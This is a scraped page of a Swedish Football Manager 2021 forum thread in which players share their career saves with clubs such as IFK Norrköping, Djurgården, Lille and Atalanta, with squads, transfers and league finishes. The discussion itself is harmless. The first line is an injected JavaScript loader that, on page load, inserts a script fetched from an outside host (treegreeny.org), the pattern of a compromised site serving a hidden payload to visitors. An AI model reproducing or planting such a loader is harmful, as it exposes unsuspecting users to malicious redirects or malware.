;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vilket lag är du? Hur går det? – Sida 12 – Football Manager 2021 – FMSweden Forum
Meny Stäng

Vilket lag är du? H...
 
Share:
Notifications
Clear all

Vilket lag är du? Hur går det?

324 Inlägg
79 Users
472 Reactions
23.3 K Visningar
Hypno
(@hypno)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 34
Topic starter  

Det är nu nyårsafton 2022 och jag har således avverkat min tredje säsong med IFK Norrköping. Det har gått riktigt bra med SM-guld tre år i rad (trots att vi "bara" tog 61 poäng säs 2) och även lyckade CL-kval. Ekonomin är helt oförskämt stark tack vare det sistnämnda samt spelarförsäljningar, och vi är i dagsläget Sveriges klart rikaste klubb med ett saldo på drygt 700 miljoner kronor. Har dock tyvärr inte hållit mig helt till grundtanken om att enbart värva nordiska spelare. Det är fortfarande överväldigande nordiskt som gäller, men jag har ändrat mig lite och tillåter mig själv att värva en utomnordisk spelare per säsong.

2020 - 1:a i Allsvenskan | 20-8-2 | 67-23, +44 | 68 poäng
2021 - 1:a i Allsvenskan | 18-7-5 | 58-23, +35 | 61 poäng
2022 - 1:a i Allsvenskan | 24-2-4 | 81-26, +55 | 74 poäng

Efter den andra säsongen gjorde jag rätt stora taktiska förändringar. Från att tidigare ha inspirerats av verklighetens IFK Norrköping där vi spelade med wingbacks, ytterforwards och med fokus på passningsspel och bollinnehav så valde jag att övergå till en klart mer direkt fotboll ämnad att komma till fler avslut i bra lägen. Satsningen har gett resultat som återspeglas i antalet mål vi petade in under fjolåret. I Europa har vi som sagt gått till Champions League. Inte bara detta år utan även under fjolåret lyckades vi kvala in. Båda gångerna slutade vi sist i gruppen.

MLi:  Andreas Linde, 29

SSF:  Oscar Almgren, 19
SSF: Riccieli, 24
SSF: Arvid Brorsson, 23

YM: Axel Björnström, 27
DSF: Simon Olsson, 25

LM:  Frank Onyeka, 24
YT: Ishaq Abdulrazak, 20

OSF: Daleho Irandust, 24

PF: Christoffer Nyman, 30
PF: Astrit Selmani, 25

Andra viktiga spelare: Eric Smith, Elias Andersson, Alexander Fransson, Victor Edvardsen

Fem största värvningarna, totalt sett:
Frank Onyeka från FC Midtjylland för 15 000 000:-
Riccieli från FC Famalicão för 14 000 000:-
Andreas Linde från Molde för 13 000 000:-
Eric Smith från KAA Gent för 13 000 000:-
Daleho Irandust från Häcken för 11 000 000:-

Fem största försäljningarna, totalt sett:
Manasse Kusu till Watford för 150 000 000:-
Isak Bergmann Johannesson till Shandong Luneng för 130 000 000:-
Sead Haksabanovic till Atletico Madrid för 50 000 000:-
Jonathan Levi till Krasnodar för 44 000 000:-
Linus Wahlqvist till Krasnodar för 38 000 000:-


   
raca14 and The Gustine reacted
SvaraCitera
raca14
(@raca14)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 225
 

@hypno

 

Skulle vilja se en saverapport från dig. 😉


   
SvaraCitera
MaximTsigalko
(@maximtsigalko)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 29
 
Postad av: @maximtsigalko

Vi krigar på

2020 - Uppflyttning med Halmstad BK

2021 - Uppflyttning med Östersund FK

21/22  5a med Arezzo i serie C / B (torsk i kvalet till serie B)

22/23 - Uppflyttning med Arezzo till serie B

2023 - Guarani (pågår)

Tog precis över Guarani i den brasilianska "Serie B" som för närvarande ligger under nedflyttningssträcket. Vi ska ligga mycket bättre till, och även om det är svårt så är det inte omöjligt att bli uppflyttade redan denna säsong. Just nu skiljer det endast 15p från nedflyttning till uppflyttning, då 4a bästa lagen går upp direkt och inte behöver klaga om jag förstått reglerna rätt. 

Jag har förbättrat mitt rykte en aning men lyckas fortfarande inte med att få gå på intervju hos något andradivision lag i Spanien/England/Italien/Tyskland än. Fick ett erbjudande från Young Boys som uppskattar mitt jobb, men eftersom dom är ett lag i den första divisionen, så tackade jag givetvis nej. Ska dock bli kul att få coacha lite i Sydamerika, då jag aldrig tidigare tränat ett lag i Brasilien. 

 

2020 - Halmstad BK, [1a i superettan] uppflyttning

2021 - Östersund FK, [1a i superettan] uppflyttning

21/22 - S.S Arezzo, [5a i serie C/B] 

22/23 - S.S. Arezzo, [1a i serie C/B] uppflyttning 

2023 - Guarani Futebol Clube [12a i Brasileiro Serie B] 

2024 - Guarani Futebol Clube [avgick mitt under säsongen] 

2024 - Deportes Melipilla [6a i Campeonato JuegaenLinea.com]

2025 - Deportes Melipilla [1a i Campeonato JuegaenLinea.com] uppflyttning

25/26 - S.S.C. Bari - [pågående]

 

 

Okej, så jag tog över Guarani i den Brasilianska andraligan, men det gick inte direkt som planerat... Min styrelse envisades med att sälja alla mina bästa spelare, och jag fick inte värva spelare över 23 heller. In kom en hel del lån och gratisvärvningar, men jag fick spel under den andra säsongen då vi blandade och gav. Vi kunde vinna mot "topplagen" samt förlora stort mot lag som låg sist i tabellen. Tillslut avgick jag, och Guarani hamnade på en andraplats i ligan och blev uppflyttade. Jag antar att det va mig det va fel på! 

Jag satte mig på ett flyg till Chile och Deportes Melipilla. Vi borde ha flyttat upp redan första säsongen då vi hamnade på en kvalplats, men efter att ha tappat en 3-2 ledning till 3-4, så fick vi tillbringa ytterligare säsong i den Chilenska andradivisionen. Vi vann ganska komfortabelt, och nu i December så började jag söka en massa jobb i Europa. 

Tillslut blev jag erbjuden ett kontrakt av Bari, som ligger sist i serie B. Endast 9 poäng har man, så det blir omöjligt att flytta upp denna säsong. Men säsongen 26/27, då jävlar! 

Mitt rykte är fortfarande 2 och en halv stjärna. Det ska bli intressant att se om jag faktiskt kan ta mig över 3 stjärnor utan att ha tränat något lag i dom högsta divisionerna. Jag blev i alla fall erbjuden jobb av både Velez och Colon i den argentinska högstadivisionen, vilket jag ser som ett bra tecken på att jag i alla fall är på väg uppåt och framåt! 


   
Micke reacted
SvaraCitera
friggan
(@friggan)
Estimable Member
Blev medlem: 4 år sedan
Inlägg: 180
 

Den Allsvenska Karusellen

Utmaningen att vinna Allsvenskan med så många lag som möjligt!

Regler:
Jag ska vinna SM-guld med så många lag som möjligt. Jag får enbart värva spelare som är övergångslistade, eller har mindre än ett halvår kvar på kontraktet. Undantag är från spelare jag redan vunnit SM-Guld med, de får jag värva allt ifrån. Jag får även värva spelare från lag som åker ur Allsvenskan. Jag är fri att värva från lag utanför Allsvenskan.

Säsong 2025

Nu gjorde jag en hel säsong med Djurgården. Vi och Hammarby drog iväg snabbt och skaffade oss ett stort försprång mot övriga lag, men vi klarade inte av att hålla i hela säsongen, vilket Hammarby definitivt gjorde. De vinner ligan på imponerande 71 poäng!

Nedflyttande lag till Superettan blev Sirius och Jönköping och uppflyttade lag blev Brage och Varberg.

Övergångar:
Jag värvade in vänsterbacken Alexander Bernhardsson gratis från Aab, som reserv bakom Eric Kahl som jag förlängde lånet ett år till med. Adam Lundqvist lämnade för Kinesiska Shijiazhuang (3,25 mil). Dit gick även anfallaren Allan Sousa för 18 miljoner. Jag värvade också in Isländska landslagsmålvakten Patrik Sigurður Gunnarsson för 1,85 miljoner från Valur. Dessutom värvade jag tillbaka Jake Larsson för 14 miljoner från Molde som spelade i Djurgården under tre säsonger innan jag tog över laget. 

I sommarfönstret valde Per Kristian Bråtveit att lämna mig för Cagliari då han såg sig utkonkurrerad av Gunnarsson. Vi fick 11 miljoner för norsken. Dessutom värvade vi Emil Holm från Milan för 9,75 miljoner. Emil gjorde det bra i Göteborg och såldes för 45 miljoner. Väl i Milan spelade han bara 9 matcher på fem säsonger. Han gjorde det helt okej hos mig men är andravalet bakom Tagessoon.  

Årets Målvakt: Patrik Sigurður Gunnarsson. Totalt 29 matcher och 7 i snitt. Konkurrerade ut Bråtveit som lämnade laget. 
Årets Back: Melker Jonsson. Vilken succé! Fyra landskamper under året, 7,12 i snittbetyg på 29 matcher. En av allsvenskans bästa mittbackar!
Årets def. Mittfältare: Grigoris Kastanos. 11 assist och två mål på 18+6 matcher, 7,13 i snittbetyg. Mycket bra även om cyprioten är väldigt skadebenägen. 
Årets off. Mittfältare: Nebiyou Perry. Återigen bästa offensiva mittfältaren! 12 mål och 6 assist på 30 matcher. 7,09 i snitt.
Årets Forward: Alex Timossi Andersson. WOW! 37 mål och 13 assist på 40 matcher, 7,38 i snittbetyg. Dessvärre är han till nästa säsong såld till Shanghai Shenhua för omkring 60 miljoner. 

HISTORIK
2020 | BK Häcken | Plats: 3 | 57 Poäng | Bästa Elvan
2021 | BK Häcken | Plats: 1 | 67 Poäng | Bästa Elvan
2022 | AIK | Plats: 2 | 65 Poäng | Bästa Elvan
2023 | AIK | Plats: 1 | 60 poäng | Bästa Elvan
2024 | Djurgården | Plats: 5 | 53 Poäng | Bästa Elvan
2025 | Djurgården | Plats: 2 | 59 poäng | Bästa Elvan

Maratontabell


   
zXc, MaximTsigalko, The Gustine and 1 people reacted
SvaraCitera
Hypno
(@hypno)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 34
Topic starter  

@raca14 Haha, det vore något. Mitt spelande är tyvärr lite för sporadiskt för närvarande.


   
SvaraCitera
friggan
(@friggan)
Estimable Member
Blev medlem: 4 år sedan
Inlägg: 180
 

Den Allsvenska Karusellen

Utmaningen att vinna Allsvenskan med så många lag som möjligt!

Regler:
Jag ska vinna SM-guld med så många lag som möjligt. Jag får enbart värva spelare som är övergångslistade, eller har mindre än ett halvår kvar på kontraktet. Undantag är från spelare jag redan vunnit SM-Guld med, de får jag värva allt ifrån. Jag får även värva spelare från lag som åker ur Allsvenskan. Jag är fri att värva från lag utanför Allsvenskan.

Säsong 2026

Trots att min bästa spelare från i fjol, Alex Timossi Andersson, lämnade laget så rustade jag definitivt för guld. Jag lyckades behålla samtliga stjänspelare och fyllde på med ett gäng offensiva spjutspetsar. Hammarby började serien svagt och jag såg min chans att rycka i tabellen. Jag fick snabbt ett oigentagbart försprång och vann tillslut på 71 poäng. Jag gjorde otroliga 87 mål och släppte in 32 stycken! Helsingborg och Brommapojkarna spelade över sin förmåga och låg tvåa och trea när halva ligan var spelad men orkade inte hålla ihop det. 

Nedflyttande lag till Superettan blev Brage, Varberg och Degerfors och uppflyttade lag blev Mjällby, Öster och Kalmar.

Nu blir det den svåraste utmaningen hittills. Kan ni gissa vilket lag jag tar över? 

Övergångar:
Som ersättare för Timossi Andersson (till Shanghai Shenhua för 60 miljoner) värvade jag Rasmus Wiedesheim-Paul för 24 miljoner från Vålerenga. Jag värvade också in högeryttern Patrik Wålemark från Borussia Mönchengladbach för 10 miljoner. Jag värvade också in gamla Djurgårdaren Edward Chilufya från Beneventu för 12 miljoner.

Vid sommarfönstret så värvades två spelare på free transfer. Det var först och främst Eric Kahl som varit utlånad till oss under två säsonger. Nu fick han sitta ett halvår på Milans läktare innan han kom tillbaka till mig! Även mittbacken Jesper Tolinsson kom in gratis från Lommel United, Belgiens andraliga. Supertalangen har varit ordinarie i fem år utan att knappt ha utvecklats alls. Då han bara är 23 hoppas vi att han kan göra det i Sverige!

Årets Målvakt: Patrik Sigurður Gunnarsson. Totalt 35 matcher och 7.04 i snitt. Ryktades till många storlag men han valde att stanna som förstemålvakt här och vinna SM-Guld! 
Årets Back: Anthonio Sanjairag. Mittbackskollega med Melker Jonsson i både klubb- och landslaget. Konkurrerade ut Uno-Larsson från startelvan denna säsong. 7,13 snittbetyg. 8 landskamper!
Årets def. Mittfältare: Grigoris Kastanos. 4 mål och 6 assist på 28+9 matcher, snittbetyg 6,98. Inte lika bra säsong som förra året. Noah Shamoun gjorde också en bra säsong på samma position!
Årets off. Mittfältare: Patrik Wålemark: Vilken bra värvning. Han ägde högerkanten totalt. 11 mål och 10 assist på 25+13 matcher. 7,27 i snittbetyg. Nebiyou Perry gjorde som vanligt en bra säsong återigen!
Årets Forward: Joel Mumbongo. Var tänkt som avbytare denna säsong på grund av den hårda konkurrensen. Men helvete vilken säsong. 26 mål, 11 assist och 7,40 i snittbetyg på 29+13 matcher. 

HISTORIK
2020 | BK Häcken | Plats: 3 | 57 Poäng | Bästa Elvan
2021 | BK Häcken | Plats: 1 | 67 Poäng | Bästa Elvan
2022 | AIK | Plats: 2 | 65 Poäng | Bästa Elvan
2023 | AIK | Plats: 1 | 60 Poäng | Bästa Elvan
2024 | Djurgården | Plats: 5 | 53 Poäng | Bästa Elvan
2025 | Djurgården | Plats: 2 | 59 Poäng | Bästa Elvan
2026 | Djurgården | Plats: 1 | 71 Poäng | Bästa Elvan

Maratontabell


   
Micke reacted
SvaraCitera
Jimpacool
(@jimpacool)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 17
 

@argt-troll 
Fint, har du kommit längre?

Inne i slutet av tredje säsongen i championchip. 
Slutade på 3e plats i tabellen, 2p efter nykomlingarna Millwall (mötte dem i näst sista matchen och tappade då 2-0 till 2-2 på stopptid och sedan vann båda lagen sista matchen). 
Möter nu Stoke i playoff, 2-2 borta i första mötet och vinnaren ställs mot antingen Wycombe eller Reading. 

Så vi får helt enkelt se om det blir PL eller championchip kommande säsong. 


   
SvaraCitera
Hypno
(@hypno)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 34
Topic starter  

Lille OSC - 2023/24

Min save tog en lite oväntad vändning då jag beslutade mig för att acceptera jobb på annat håll än Peking. Har sedan tidigare fått erbjudanden från bl.a. Torino och Toulouse, men då blankt sagt nej. Nu var det dock franska storklubben Lille som ville ha mina tjänster, och det blev lite för lockande. Sparade min gärning som Peking-tränare separat, så att jag har möjligheten att återuppta arbetet där senare.

När jag tog över Lille låg man på en blygsam tolfteplats halvvägs in i säsongen. Det var dock vid sidan om topptrion PSG, Monaco och Lyon en tät tabell med blott fem poäng upp till fjärdeplats. De föregående säsongerna i saven har Lille slutat som sämst fyra (och bäst trea), och det var EL-plats som krävdes när jag tog över. Vi slutade till sist också på en fjärdeplats. På pappret var vi bara tre poäng från tredjeplats och CL-spel, men då ska det sägas att trean Monaco förlorade alla sina sista tre matcher medan vi vann våra sista tre, så CL-platsen var egentligen körd sedan länge.

Inför kommande säsong siktar jag på att bryta mig in i topp tre och nå CL. Vi har ett spelarmaterial som i mina ögon inte är sämre än det Lyon har, och bara snäppet under Monaco. Oljeshejkerna ska vi däremot tala tyst om. Taktiskt sett tar jag med mig mitt lyckade koncept från Peking - något som även lämpar sig väldigt väl för spelarmaterialet då Lille vid mitt övertagande endast hade en bra ytterback (som numera är såld).

Markerade värvningar är de jag själv gjort i januari förra säsongen samt nu under sommaren, resten av spelarna fanns i klubben när jag tog över.

MLi:  Mike Maignan, 28

SSF:  Joris Gnagnon, 26
SSF: Tanguy Nianzou, 21 - från Bayern München för 31 000 000:-
SSF:  Juan Miranda, 23

YT:  Edon Zhegrova, 24
DSF:  Ivonei, 21 - från Santos för 157 000 000:-

LM:  Mady Camara, 26 - från Olympiakos för 105 000 000:-
YT:  Wanderson, 29

OSF:  Yusuf Yazici, 26

OF:  Amine Gouiri, 23 - från Nice för 340 000 000:-
PF:  Jonathan David, 23

Andra viktiga spelare: Louka Huberty, Igor Rabello, Rubén García, Christian Kouamé


   
SvaraCitera
Jimpacool
(@jimpacool)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 17
 
Postad av: @jimpacool

@argt-troll 
Fint, har du kommit längre?

Inne i slutet av tredje säsongen i championchip. 
Slutade på 3e plats i tabellen, 2p efter nykomlingarna Millwall (mötte dem i näst sista matchen och tappade då 2-0 till 2-2 på stopptid och sedan vann båda lagen sista matchen). 
Möter nu Stoke i playoff, 2-2 borta i första mötet och vinnaren ställs mot antingen Wycombe eller Reading. 

Så vi får helt enkelt se om det blir PL eller championchip kommande säsong. 

Uppdatering här då. 
slog Stoke med 5-4 i förlängning efter två möten. Wycombe i finalen där jag torskade efter straffar, så det blir att harva kvar där nere en femte säsong. 


   
Argt Troll reacted
SvaraCitera
(@pcch7)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 57
 

Tog tio säsonger med Atalanta men jag har till slut fått ett mål godkänt efter VAR granskning. Finns inget mer att uppnå nu egentligen


   
SvaraCitera
Peter Hecktor
(@peter-hecktor)
Ägare
Blev medlem: 4 år sedan
Inlägg: 287
 

@pcch7 Game over!


   
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 155
 

                                                             

IFK MARIEHAMN
SÄSONG 2 | Ligan: 1/12 | Cupen: Vinnare | ECL: Ut i tredje kvalrundan

Som regerande cupmästare och bronsmedaljörer i ligan klev vi in i den nya säsongen med målet att göra en minst lika bra säsong. In till klubben anslöt en trio under vintern och en kvartett under sommaren där MAI TRAORE och JARKKO OKSANEN kan anses vara de två mest namnkunniga av nyförvärven. Ut lämnade vår nyckelspelare Robin Buwalda under sommaren, men där fick vi hela 4.75 miljoner från NAC Breda för besväret. Pengar som kunde möjliggöra sommarförvärven.

Ligan var ett enlagsrace från start till mål och där kunde vi ta hem Veikkausliiga redan efter 23 utav 27 omgångar. Även cupen hämtades hem, men där fick vi kämpa rejält då SJK tvingade oss till en förlängning. Vi var verkligen kungarna Finland detta år där vår frejdiga offensiv skapade rejält med huvudbry för motståndarförsvararen med hela 77 gjorda ligamål. Vi fick även testa våra vingar i Europa när det nalkades spel i Europa Conference League. Där slog vi ut Zeljeznicar (7-4) och Tabor Sezana (6-5) innan Hajduk Split blev för svåra (0-2) i den tredje kvalrundan. För detta fick vi in cirka tre miljoner kronor, vilket var mer än välbehövligt då vår ekonomi fortsatt är rätt begränsad.

Nu väntar en förhoppningsvis lugn vinter, där jag vill satsa på kontinuitet och bygga vidare på den nuvarande truppen som innehåller en hel del spets men även talang. I dagsläget består seniorlaget av nio egna produkter där sex utav dem kommit fram som regens under mina två år i IFK. Förhoppningen är att dessa ska kunna bli stabila truppspelare med undantaget ANTON HELLSTRÖM, som ser ut och kunna bli en framträdande spelare för oss på sikt. I dagsläget ryktas Bodö/Glimt vara ute efter vår guldklimp, men förhoppningsvis kan vi hålla kvar honom på Åland.

Värvningar: 7 (0k) | Förluster: 2 (4.75milj) | Saldo: -3 miljoner


   
SvaraCitera
(@ericaallflood)
Active Member
Blev medlem: 4 år sedan
Inlägg: 5
 

Ett inlägg som ska försöka skrivas utan att låta som en douche. Men, så här är det. 

Jag tog över Sunderland i League one efter tio år efter alla andra ha sett den sorgliga dokumentären på Netflix.

Min tanke och förhoppning om saven var att kriga mig till en Championship plats helst säsong ett, annars säsong två. 

Då klubben är fattig så tänkte jag att detta skulle bli tufft. 

Nu till vad jag tycker är märkligt. Jag sprang genom L1 utan att egentligen tänka på att jag skulle missa avancemang. Ledde hela säsongen och gick upp till CS utan en enda värvning.

När jag väl landade i CS inför säsong 2 så hade vi som målsättning att undvika nedflyttning. Denna säsong låg jag etta/tvåa under hela säsongen för att sluta tvåa och avancera till PL.

Inför denna säsong plockade jag visserligen in en anfallare som var bänkad i PL, även två lån. En MC och en MB. Men jag tycker det är sjukt hur lätt jag gick upp till PL. 

Väl i PL öppnade jag med en 4-0-vinst mot Spurs, som sedan följdes upp av uddamålsförlust mot Chelsea borta. 

Min fråga eller tanke är, är det någon annan som känt att avancemang i seriesystemet blivit lättare än föregående upplagor? 

 

 


   
SvaraCitera
(@pcch7)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 57
 

@ericaallflood kan hålla med om det, brukar sällan va så svårt. Vet inte om det är att jag nästan alltid kör väldigt offensivt, och det brukar alltid leda till stor framgång i FM oavsett vilket lag jag har i princip men det känns nästan lite lätt ibland.


   
SvaraCitera
(@pcch7)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 57
 

Är nu halvvägs genom 2031/2032 säsongen med mitt Atalanta. Inför säsongen så tackades Zaniolo av och såldes till Real Madrid efter tre år här. Han plockades in för att vinna CL och det gick ju rätt bra ändå då vi vann CL alla tre säsonger med honom i laget. Två av finalerna spelade han en stor roll i, lite blekare nu senast då vi höll på att sjabbla till det mot Lyon men vände å vann till slut.

Plockade in en annan tung pjäs för att ersätta honom, fast jag är inte helt övertygad än.


   
friggan reacted
SvaraCitera
(@pcch7)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 57
 

En mycket underhållande säsong än så länge, offensiven sprudlar igen för oss efter en aningen svagare säsong innan denna. Genoa som har slagits runt Europa platserna dom flesta säsonger gick riktigt svagt och sparkade Vincenzo Torrente som tränade dom i 9 år. Han blev en favorit för mig för han spelar en skön formation tycker jag, lånat många spelare till honom dessutom. Ersättaren blev Mauricio Pochettino som lyfte dom igen, och tog dom upp i topp 4 den här säsongen innan han helt plötsligt lämnar för ett krisande Bournemouth av alla lag. Knasigt.

Lazio har plockat in den store Zinedine Zidane som manager, inte gjort nåt stordåd än men det är kul ändå. Juventus har skärpt till sig lite igen, mycket tack vare en anfallare jag sålt till dom som jag nästan ångrar lite eftersom han aldrig fått nån chans hos mig. Men men. Torino i sin återkomst till Serie A presterar långt över förväntan, vilket jag också gillar eftersom jag har försökt hjälpa dom i flera säsonger nu med spelarlån.


   
friggan reacted
SvaraCitera
(@pcch7)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 57
 

Romas kräftgång fortsätter, börjar tro att dom kommer ryka till slut.


   
SvaraCitera
(@pcch7)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 57
 

Till slut händer det


   
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 155
 
Postad av: @pcch7

Till slut händer det

 

Okej det där var bland det sjukare man sett!


   
SvaraCitera
(@pcch7)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 57
 

@argt-troll det här laget går som ett tåg i Serie A. Hade nog inte gått i PL med dom pengarna som finns där, alla topplagen har sjuka spelare där


   
SvaraCitera
Sida 12 / 17
Share: